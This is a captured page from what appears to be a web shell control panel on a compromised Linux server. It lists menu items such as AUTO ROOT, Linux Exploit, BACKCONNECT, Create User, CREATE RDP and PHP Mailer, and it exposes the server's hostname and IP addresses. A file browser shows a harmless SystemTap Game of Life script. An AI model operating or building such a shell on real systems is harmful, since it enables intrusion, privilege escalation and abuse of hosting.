Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
examples /
stapgames /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
tapset
[ DIR ]
drwxr-xr-x
2048.meta
250
B
-rw-r--r--
2048.stp
4.87
KB
-rw-r--r--
block.meta
251
B
-rw-r--r--
block.stp
2.34
KB
-rwxr-xr-x
eater.meta
187
B
-rw-r--r--
eater.stp
3.22
KB
-rwxr-xr-x
lifegame.meta
216
B
-rw-r--r--
lifegame.stp
1.09
KB
-rwxr-xr-x
pingpong.meta
338
B
-rw-r--r--
pingpong.stp
768
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lifegame.stp
#!/usr/bin/stap # lifegame # Copyright (C) 2008 Masami Hiramatsu <masami.hiramatsu@gmail.com> # # This file is free software and is distributed under the terms of the GNU # General Public License (GPL); either version 2, or (at your option) any # later version. global X_MAX=15, Y_MAX=15 global map, tmp global t function showupdate() { print("\033[1;1H\033[J") # clear screen delete map foreach([x,y] in tmp) { printf("\033[%d;%dH", y+1, x+1) # move cursor print("o") map[x,y] = 1 } delete tmp } function lookaround(x,y) { return map[x-1,y-1] + map[x,y-1] + map[x+1,y-1] + map[x-1,y ] + map[x+1,y ] + map[x-1,y+1] + map[x,y+1] + map[x+1,y+1] } probe timer.ms(10) { t ++ if (t == Y_MAX) { showupdate() t = -1 next # skip to the next timer. } # updating just 1 line y = t for (x=0; x < X_MAX; x++) { c = lookaround(x,y) if (c == 3) tmp[x,y] = 1 else if (c == 2 && [x,y] in map) tmp[x,y] = map[x,y] } } probe begin { tmp[6,5] = 1; tmp[5,6] = 1; tmp[4,7] = 1; tmp[5,7] = 1 tmp[6,7] = 1 showupdate() t = -1 }
Close